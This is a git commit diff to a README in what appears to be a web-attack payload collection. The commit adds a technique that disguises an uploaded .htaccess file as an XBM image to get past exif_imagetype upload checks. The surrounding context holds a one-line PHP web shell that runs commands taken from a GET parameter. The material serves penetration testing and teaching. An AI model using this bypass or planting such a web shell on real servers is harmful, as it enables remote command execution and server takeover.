Merge pull request #38 from n3v4/master

Add exif_imagetype bypass
2025-01-30 23:25:03 +00:00 · 2019-02-02 11:36:22 +01:00 · 2019-02-02 11:36:22 +01:00 · 357f8a69a8
commit 357f8a69a8
parent ffde81e2c0 b30ac4e5bb
1 changed files with 12 additions and 1 deletions
--- a/.htaccess/README.md
+++ b/.htaccess/README.md
@ -25,7 +25,18 @@ AddType application/x-httpd-php .htaccess
 <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
 ```

+# .htaccess upload as image
+
+If on server side for determine the type of an image used exif_imagetype function, try upload .htaccess file like [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) image.
+
+```python
+#define test_width 100
+#define test_height 100
+
+# .htaccess file
+```
+
 ## Thanks to

 * [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
-* [](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
+* [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)